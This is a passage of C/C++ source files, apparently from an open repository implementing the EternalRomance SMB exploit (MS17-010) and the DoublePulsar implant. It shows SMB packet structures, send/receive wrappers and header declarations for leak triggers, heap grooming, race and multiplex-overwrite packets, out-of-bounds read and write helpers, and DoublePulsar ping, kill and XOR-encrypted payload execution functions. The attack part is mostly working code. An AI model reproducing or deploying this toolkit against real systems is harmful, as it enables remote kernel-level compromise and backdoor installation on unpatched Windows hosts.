1465 | BOOLEAN SendRecvTreeDisconnect(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1466 | {
1467 | static unsigned int sendsize[2], recvsize[2];
1468 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1469 | packet_creation_handler_type_one create_packet = &tree_disconnect_packet;
1470 |
1471 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1472 | return FALSE;
1473 |
1474 | if (badsock(s))
1475 | return FALSE;
1476 |
1477 | if (isnull(create_packet))
1478 | return FALSE;
1479 |
1480 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
1481 | return FALSE;
1482 |
1483 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1484 |
1485 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1486 | return FALSE;
1487 |
1488 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1489 |
1490 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1491 | return FALSE;
1492 |
1493 | bwsalloc(&tmp, GetUlong(recvsize));
1494 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1495 | bwsfree(client);
1496 |
1497 | bwsalloc(client, tmp.dwsize);
1498 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1499 | bwsfree(&tmp);
1500 |
1501 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
1502 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1503 |
1504 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1505 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1506 |
1507 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1508 | return FALSE;
1509 |
1510 | return TRUE;
1511 | }
1512 |
1513 | BOOLEAN SendRecvLogoffAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1514 | {
1515 | static unsigned int sendsize[2], recvsize[2];
1516 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1517 | packet_creation_handler_type_one create_packet = &logoff_andx_packet;
1518 |
1519 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1520 | return FALSE;
1521 |
1522 | if (badsock(s))
1523 | return FALSE;
1524 |
1525 | if (isnull(create_packet))
1526 | return FALSE;
1527 |
1528 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
1529 | return FALSE;
1530 |
1531 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1532 |
1533 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1534 | return FALSE;
1535 |
1536 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1537 |
1538 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1539 | return FALSE;
1540 |
1541 | bwsalloc(&tmp, GetUlong(recvsize));
1542 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1543 | bwsfree(client);
1544 |
1545 | bwsalloc(client, tmp.dwsize);
1546 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1547 | bwsfree(&tmp);
1548 |
1549 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
1550 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1551 |
1552 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1553 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1554 |
1555 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1556 | return FALSE;
1557 |
1558 | return TRUE;
1559 | }
1560 |
1561 | /*
1562 | *
1563 | *
1564 | *
1565 | * Equation Group MS17-10 vulnerablity check networking function(s)
1566 | *
1567 | *
1568 | *
1569 | */
1570 |
1571 | BOOLEAN SendRecvTransPeekNamedPipeCheck(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
1572 | {
1573 | static unsigned int sendsize[2], recvsize[2];
1574 | BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
1575 | packet_creation_handler_type_one create_packet = &trans_peek_namedpipe_check_packet;
1576 |
1577 | if (isnull(outbound) || isnull(inbound) || isnull(info))
1578 | return FALSE;
1579 |
1580 | if (badsock(s))
1581 | return FALSE;
1582 |
1583 | if (isnull(create_packet))
1584 | return FALSE;
1585 |
1586 | if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
1587 | return FALSE;
1588 |
1589 | PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));
1590 |
1591 | if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
1592 | return FALSE;
1593 |
1594 | PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));
1595 |
1596 | if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
1597 | return FALSE;
1598 |
1599 | bwsalloc(&tmp, GetUlong(recvsize));
1600 | cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
1601 | bwsfree(client);
1602 |
1603 | bwsalloc(client, tmp.dwsize);
1604 | cpy(client->pbdata, tmp.pbdata, client->dwsize);
1605 | bwsfree(&tmp);
1606 |
1607 |
1608 | inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
1609 | outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
1610 |
1611 | inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
1612 | outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
1613 |
1614 |
1615 | if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
1616 | return FALSE;
1617 |
1618 | return TRUE;
1619 | }
1620 |
1621 | #pragma warning(pop)
--------------------------------------------------------------------------------
/ntcreateandx.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "sessionsetupandx.h"
3 |
4 | #pragma pack(push, 1)
5 |
6 | typedef struct REQ_NT_CREATE_ANDX
7 | {
8 | BYTE WordCount;
9 | BYTE AndxCommand;
10 | BYTE AndxReserved;
11 | WORD AndxOffset;
12 | BYTE Reserved;
13 | WORD NameLength;
14 | DWORD Flags;
15 | DWORD RootDirectoryFID;
16 | DWORD DesiredAccess;
17 | LARGE_INTEGER AllocationSize;
18 | DWORD ExtFileAttributes;
19 | DWORD ShareAccess;
20 | DWORD CreateDisposition;
21 | DWORD CreateOptions;
22 | DWORD ImpersonationLevel;
23 | BYTE SecurityFlags;
24 | WORD ByteCount;
25 | BYTE Bytes[1];
26 | }*PREQ_NT_CREATE_ANDX;
27 |
28 |
29 | typedef struct RESP_NT_CREATE_ANDX {
30 | BYTE AndxCommand;
31 | BYTE AndxReserved;
32 | WORD AndxOffset;
33 | BYTE OpLockLevel;
34 | WORD Fid;
35 | BYTE etc[1];
36 | }*PRESP_NT_CREATE_ANDX;
37 |
38 |
39 | #pragma pack(pop)
40 |
41 |
--------------------------------------------------------------------------------
/sessionsetupandx.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "smbtransaction.h"
3 |
4 | #pragma pack(push, 1)
5 |
6 | typedef struct ANDX {
7 | BYTE AndxCommand;
8 | BYTE Reserved;
9 | WORD AndxOffset;
10 | }*PANDX;
11 |
12 |
13 | typedef struct _REQ_SESSIONSETUP_ANDX {
14 | BYTE WordCount;
15 | ANDX andx;
16 | WORD MaxBufferSize;
17 | WORD MaxMpxCount;
18 | WORD VcNumber;
19 | DWORD SessionKey;
20 | WORD PasswordLength;
21 | DWORD Reserved;
22 | WORD ByteCount;
23 | union {
24 | struct {
25 | BYTE Password;
26 | BYTE Buffer[1];
27 | };
28 | BYTE Bytes[2];
29 | };
30 | }REQ_SESSIONSETUP_ANDX, * PREQ_SESSIONSETUP_ANDX;
31 |
32 | typedef struct _REQ_NT_SESSIONSETUP_ANDX {
33 | BYTE WordCount;
34 | ANDX Andx;
35 | WORD MaxBufferSize;
36 | WORD MaxMpxCount;
37 | WORD VcNumber;
38 | DWORD SessionKey;
39 | WORD CaseInsensitivePasswordLength;
40 | WORD CaseSensitivePasswordLength;
41 | DWORD Reserved;
42 | DWORD Capabilities;
43 | WORD ByteCount;
44 | BYTE Buffer[1];
45 | }REQ_NT_SESSIONSETUP_ANDX, * PREQ_NT_SESSIONSETUP_ANDX;
46 |
47 | typedef struct _RESP_SESSIONSETUP_ANDX {
48 | BYTE WordCount;
49 | ANDX Andx;
50 | WORD Action;
51 | WORD ByteCount;
52 | BYTE Buffer[1];
53 | }RESP_SESSIONSETUP_ANDX, * PRESP_SESSIONSETUP_ANDX;
54 |
55 |
56 | typedef struct _REQ_WRITE_ANDX {
57 | BYTE WordCount;
58 | union {
59 | ANDX andx;
60 | struct {
61 | BYTE AndxCommand;
62 | BYTE AndxReserved;
63 | WORD AndxOffset;
64 | };
65 | };
66 | WORD Fid;
67 | DWORD Offset;
68 | DWORD Timeout;
69 | WORD WriteMode;
70 | WORD Remaining;
71 | WORD Reserved;
72 | WORD DataLength;
73 | WORD DataOffset;
74 | WORD ByteCount;
75 | BYTE Buffer[1];
76 | }REQ_WRITE_ANDX, * PREQ_WRITE_ANDX;
77 |
78 | typedef struct _RESP_WRITE_ANDX {
79 | BYTE WordCount;
80 | //Words
81 | ANDX Andx;
82 | WORD Count;
83 | WORD Available;
84 | DWORD Reserved;
85 | //SMB_DATA
86 | WORD ByteCount;
87 | }RESP_WRITE_ANDX, * PRESP_WRITE_ANDX;
88 |
89 | #pragma pack(pop)
--------------------------------------------------------------------------------
/smb.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #pragma once
3 | #ifndef UNICODE
4 | #define UNICODE
5 | #endif
6 | #include "treeconnectandx.h"
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include "ntcreateandx.h"
15 | #include "smbpacketstrings.h"
16 |
17 | #pragma intrinsic(memcpy, memset, memcmp)
18 | #pragma auto_inline(off)
19 |
20 | #pragma pack(push, 1)
21 |
22 | typedef struct _SMB_HEADER {
23 | BYTE Protocol[4];
24 | BYTE Command;
25 | union {
26 | struct {
27 | BYTE ErrorClass;
28 | BYTE Reserved;
29 | WORD Error;
30 | }DosError;
31 | DWORD NtStatus;
32 | }Status;
33 | BYTE Flags;
34 | WORD Flags2;
35 | union {
36 | WORD Reserved[6];
37 | struct {
38 | WORD PidHigh;
39 | union {
40 | struct {
41 | DWORD Key;
42 | WORD Sid;
43 | WORD SequenceNumber;
44 | WORD Gid;
45 | };
46 | BYTE SecuritySignature[8];
47 | };
48 | };
49 | };
50 | WORD Tid;
51 | WORD Pid;
52 | WORD Uid;
53 | WORD Mid;
54 | }SMB_HEADER, * PSMB_HEADER;
55 |
56 | #pragma pack(pop)
57 |
58 | struct smb_info {
59 | WORD fid;
60 | WORD tid;
61 | WORD pid;
62 | WORD uid;
63 | WORD mid;
64 | WORD special_mid;
65 | WORD special_pid;
66 | UNICODE_STRING tree_connection;
67 | STRING tree_connect_andx_svc;
68 | BYTE AndxCommand;
69 | WORD AndxOffset;
70 | PVOID sockaddrpointer;
71 | PVOID socketpointer;
72 | PVOID wsapointer;
73 | DWORD_PTR connection_handle;
74 | DWORD srv_last_error;
75 | BYTE headerinfo[32];
76 | BOOL DoublePulsarInstalled;
77 | WORD DoublePulsarXorKey;
78 | WORD TransIndataShiftCount;
79 | WORD TransFragTagOffset;
80 | WORD TransConnectionOffset;
81 | ULONG_PTR LastOOBReadAddress;
82 | ULONG_PTR LastOOBWriteAddress;
83 | };
84 |
85 | typedef struct BUFFER {
86 | DWORD dwsize;
87 | PBYTE pbdata;
88 | }BUFWITHSIZE, * PBUFWITHSIZE;
89 |
90 | struct LeakedDataLinkedList {
91 | BUFFER KrnlLeakResponse;
92 | PDWORD ResponseNetbios;
93 | PSMB_HEADER ResponseHeader;
94 | PBYTE ResponseParameters;
95 | PBYTE ResponseData;
96 | LeakedDataLinkedList* NextEntry;
97 | };
98 |
99 | struct ResponsePacketLinkedList {
100 | BUFFER ThisPacket;
101 | PSMB_HEADER ThisSmb;
102 | PVOID ThisNetbiosSize; //(WORD *)
103 | ResponsePacketLinkedList* NextEntry;
104 | };
105 |
106 | struct RequestPacketLinkedList {
107 | BUFFER ThisPacket;
108 | PSMB_HEADER ThisSmb;
109 | PVOID ThisNetbiosSize; //(WORD *)
110 | RequestPacketLinkedList* NextEntry;
111 | };
112 |
113 | #pragma pack(push, 1)
114 |
115 | typedef struct ANYPOINTER {
116 | union {
117 | PVOID pvpointer;
118 | PBYTE pbpointer;
119 | PSTR ppointer;
120 | PWSTR pwpointer;
121 | ULONG_PTR address;
122 | ULONG_PTR* paddress;
123 | BYTE addressbytes[sizeof(PVOID)];
124 | };
125 | }*PANYPOINTER;
126 |
127 | typedef struct SMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST {
128 | union {
129 | ANYPOINTER AnyNetbiosSizeAddress;
130 | WORD* NetbiosSize;
131 | };
132 |
133 | union {
134 | ANYPOINTER SmbAnyAddress;
135 | PSMB_HEADER Smb;
136 | };
137 |
138 | union {
139 | ANYPOINTER Transaction2AnyAddress;
140 | PREQ_TRANSACTION2 Trans2;
141 | };
142 |
143 | union {
144 | ANYPOINTER Trans2SessionSetupAnyAddress;
145 | PREQ_TRANSACTION2_SESSION_SETUP Trans2SessionSetup;
146 | };
147 | }*PSMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST;
148 |
149 | #pragma pack(pop)
150 |
151 | typedef PBYTE(*packet_creation_handler_type_one)(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
152 |
153 | BOOL __cdecl __memcmp(const void* a, const void* b, DWORD size);
154 |
155 | #define cpy(dst, src, size) (memcpy(dst, src, (size_t)(size)))
156 | #define cmp(a, b, size) (__memcmp(a, b, size))
157 | #define bzero(ptr, size) (memset((ptr), 0x00, (size_t)(size)))
158 |
159 |
160 | BOOL find_memory_pattern(BUFFER IN* bws, PANYPOINTER IN OUT result, const void* IN pattern, DWORD IN patternsize);
161 | VOID update_smb_info(smb_info* info, BUFFER* IN newpacket);
162 | void csprng(PBYTE buffer, DWORD size);
163 | unsigned int random(void);
164 |
165 | DWORD __stdcall FindLeakedTrans2DispatchTable(BUFFER IN* bws);
166 | DWORD __stdcall GetDoublePulsarStatusCode(BUFFER* IN bws, BUFFER IN* request);
167 | DWORD __stdcall GetDoublePulsarOpCode(BUFFER* IN bws);
168 | BOOL __stdcall GenerateDoublePulsarOpcodePacket(BUFFER* IN OUT bws, BYTE opcode);
169 | DWORD __stdcall GetDoublePulsarXorKey(BUFFER* IN bws);
170 | ULONG_PTR __stdcall GetOOBWriteAddress(BUFFER* IN packet);
171 |
172 | //parameters is output, opcode is input, and if opcode == DOPU_EXEC_OPCODE then datalength is a pointer to length of payload, if opcode is exec specify the dopu arguement
173 | PBYTE GenerateDoublePulsarTrans2SessionSetupParameters(BUFFER* IN OUT parameters, DWORD IN opcode, DWORD* IN OPTIONAL datalength, DWORD IN OPTIONAL xorkey, PSMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST last_trans2_session_setup_req);//PBYTE GenerateDoublePulsarTrans2SessionSetupParameters(BUFFER* IN OUT parameters, DWORD IN opcode, DWORD *IN OPTIONAL datalength, DWORD IN OPTIONAL xorkey);
174 | PBYTE PadDoPuPayloadToProperSize(BUFFER IN OUT* payload);
175 | BOOL __stdcall XorEncryptPayload(BUFFER IN OUT* payload, DWORD IN xorkey);
176 |
177 |
178 | ULONG_PTR** __stdcall GetAllOOBReadAddressesFromMultiRequest(BUFFER* IN packet, DWORD IN smbcount);
179 | DWORD __stdcall FindLeakedDataFragTag(BUFFER IN* packet);
180 | DWORD __stdcall FindLeadedDataLStrTag(BUFFER IN* packet);
181 |
182 | BOOL AllocateSmbLibLastTrans2SessionSetupRequestStructure(SMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST** IN OUT pointertostructpointer, DWORD IN numbertoallocate);
183 | BOOL FreeSmbLibLastTrans2SessionSetupRequestStructure(SMBLIB_LAST_TRANS2_SESSION_SETUP_REQUEST** IN OUT pointertostructpointer);
184 |
185 | /*
186 | *
187 | *
188 | * memory allocation buffer with size functions
189 | *
190 | *
191 | */
192 |
193 | void bwsalloc(BUFFER OUT* bws, DWORD IN size);
194 | void bwsfree(BUFFER IN* bws);
195 | BOOL bwscat(BUFFER IN OUT* dst, BUFFER IN* src);
196 |
197 | BUFFER* OUT bwsnew(DWORD IN count);
198 | BOOL bwsdelete(BUFFER **IN OUT bws);
199 | BOOL bwsallocateandcopy(BUFFER IN OUT* bws, const void IN* src, DWORD IN size);
200 |
201 |
202 |
203 | /*
204 | *
205 | *
206 | * Linked list functions
207 | *
208 | *
209 | */
210 |
211 | void __stdcall FreeRequestLinkedListBuffers(RequestPacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
212 | void __stdcall FreeResponseLinkedListBuffers(ResponsePacketLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
213 | void __stdcall FreeLeakdataLinkedListBuffers(LeakedDataLinkedList* IN OUT liststart, DWORD* IN ListElementCount);
214 | void __stdcall FreeRequestLinkedListSingleEntry(RequestPacketLinkedList* IN OUT entrypointer);
215 | void __stdcall FreeResponseLinkedListSingleEntry(ResponsePacketLinkedList* IN OUT entry);
216 |
217 | /*
218 | *
219 | *
220 | * STRING functions
221 | *
222 | *
223 | */
224 |
225 | void __stdcall InitString(PCSTR IN cstr, STRING* IN OUT str);
226 | void __stdcall FreeString(STRING* IN OUT str);
227 | void __stdcall InitUnicodeString(PCWSTR IN cstr, UNICODE_STRING* IN OUT str);
228 | void __stdcall FreeUnicodeString(UNICODE_STRING* IN OUT str);
229 | void __stdcall ConvertStringToUnicode(STRING* IN s, UNICODE_STRING* IN OUT u);
230 | void __stdcall ConvertUnicodeToString(UNICODE_STRING* IN u, STRING* IN OUT s);
231 | void DumpHex(const void* vdata, DWORD size);
232 |
233 | WORD get_pid(smb_info*);
234 | WORD get_uid(smb_info*);
235 | WORD get_mid(smb_info*);
236 | WORD get_tid(smb_info*);
237 | WORD get_fid(smb_info*);
238 | WORD get_special_mid(smb_info*);
239 | WORD get_special_pid(smb_info*);
240 | void set_pid(smb_info*, WORD);
241 | void set_uid(smb_info*, WORD);
242 | void set_mid(smb_info*, WORD);
243 | void set_tid(smb_info*, WORD);
244 | void set_fid(smb_info*, WORD);
245 | void set_special_mid(smb_info*, WORD);
246 | void set_special_pid(smb_info*, WORD);
247 |
248 |
249 | /*
250 | *
251 | *
252 | * networking functions
253 | *
254 | *
255 | */
256 |
257 | unsigned int TargetConnect(SOCKET& s, sockaddr_in& sa, WSAData& wsa, const char* targetip, unsigned int& status);
258 | unsigned int SendData(BUFFER IN OUT* bws, SOCKET& s, unsigned int& status);
259 | unsigned int RecvData(BUFFER IN OUT* bws, DWORD IN bufsize, SOCKET& s, unsigned int& status);
260 | unsigned int CloseAndClearSocket(SOCKET IN OUT& sfd, BOOLEAN IN WSAClean);
261 |
262 |
263 | /*
264 | *
265 | *
266 | * begin smb packet creation functions
267 | *
268 | *
269 | */
270 |
271 | /*
272 | *
273 | *
274 | * EternalRomance packet creation functions
275 | *
276 | *
277 | */
278 |
279 | PBYTE negotiate_request_packet(BUFFER* IN OUT bws, WORD pid, WORD uid, WORD mid, WORD tid);
280 | PBYTE session_setup_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
281 | PBYTE tree_connect_packet(BUFFER IN OUT* bws, UNICODE_STRING* unc, WORD pid, WORD uid, WORD mid, WORD tid);
282 | PBYTE nt_create_andx_packet(BUFFER IN OUT* bws, WORD rootfid, WORD pid, WORD uid, WORD mid, WORD tid);
283 | PBYTE trans_dcerpc_bind_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
284 | PBYTE write_andx_lsarpc_getusername_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
285 | PBYTE trans_trigger_first_leak_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
286 | PBYTE trans_groom_type_one_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
287 | PBYTE trans_multirequest_type_one_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD* mids, WORD tid);
288 | PBYTE trans_multirequest_type_one_number_two_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD* mids, WORD tid);
289 | PBYTE trans_multirequest_type_one_number_three_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
290 | PBYTE trans_groom_type_two_packet(BUFFER IN OUT* bws, WORD pid, WORD uid, WORD mid, WORD tid);
291 | PBYTE trans_secondary_trigger_second_leak_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
292 | PBYTE write_andx_shift_indata_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid, WORD IN fid);
293 | PBYTE trans_secondary_mid_overwrite_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
294 | PBYTE trans_secondary_first_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
295 | PBYTE trans_secondary_first_special_mid_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
296 | PBYTE trans_secondary_race_type_one_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
297 | PBYTE trans_secondary_second_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
298 | PBYTE trans_secondary_race_type_two_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
299 | PBYTE trans_secondary_third_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
300 | PBYTE trans_secondary_second_race_type_two_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
301 | PBYTE trans_secondary_fourth_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
302 | PBYTE trans_secondary_third_race_type_two_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
303 | PBYTE nt_create_andx_second_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
304 | PBYTE trans_secondary_fifth_mid_zero_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
305 |
306 | /*
307 | *
308 | *
309 | * DoublePulsar smb packet creation functions
310 | *
311 | *
312 | */
313 |
314 | PBYTE trans2_session_setup_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
315 | PBYTE trans2_session_setup_dopu_kill(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
316 | PBYTE trans2_session_setup_dopu_ping(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
317 | PBYTE trans2_session_setup_dopu_exec(BUFFER IN OUT* bws, BUFFER IN* xorkeypacket, BUFFER IN* payload, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
318 |
319 | PBYTE tree_disconnect_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
320 | PBYTE logoff_andx_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
321 |
322 | PBYTE trans_peek_namedpipe_check_packet(BUFFER IN OUT* bws, WORD IN pid, WORD IN uid, WORD IN mid, WORD IN tid);
323 |
324 | BOOLEAN SendRecvNegotiate(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info);
325 | BOOLEAN SendRecvSessionSetupAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info);
326 | BOOLEAN SendRecvTreeConnectAndx(RequestPacketLinkedList OUT* outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* info, PCWSTR IN ip);
327 | BOOLEAN SendRecvNtCreateAndx(RequestPacketLinkedList* OUT outbound, ResponsePacketLinkedList OUT* inbound, SOCKET& s, smb_info* IN info);
328 | BOOLEAN SendRecvTransDcerpcBind(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
329 | BOOLEAN SendRecvLsaGetUsername(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
330 | BOOLEAN SendRecvTransFirstLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info);
331 | BOOLEAN SendRecvTransGroomTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
332 | BOOLEAN SendRecvTransFirstMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
333 | BOOLEAN SendRecvTransSecondMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
334 | BOOLEAN SendRecvTransThirdMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
335 | BOOLEAN SendRecvTransGroomTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info);
336 | BOOLEAN SendRecvTransSecondarySecondLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info);
337 | BOOLEAN SendRecvWriteAndxIndataShift(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
338 | BOOLEAN SendRecvTransSecondaryMultiplexOverwrite(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
339 | BOOLEAN SendRecvTransSecondaryFirstMuliplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
340 | BOOLEAN SendRecvTransSecondaryFirstSpecialMultiplex(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
341 | BOOLEAN SendRecvTransSecondaryRaceTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
342 | BOOLEAN SendRecvTransSecondarySecondMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
343 | BOOLEAN SendRecvTransSecondaryRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
344 | BOOLEAN SendRecvTransSecondaryThirdMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
345 | BOOLEAN SendRecvTransSecondarySecondRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
346 | BOOLEAN SendRecvTransSecondaryFourthMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
347 | BOOLEAN SendRecvTransSecondaryThirdRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info);
348 | BOOLEAN SendRecvSecondNtCreateAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
349 |
350 | /*
351 | *
352 | *
353 | *
354 | * DoublePulsar Networking Functions
355 | *
356 | *
357 | */
358 |
359 | BOOLEAN SendRecvTrans2SessionSetup(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
360 | BOOLEAN SendRecvTreeDisconnect(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info);
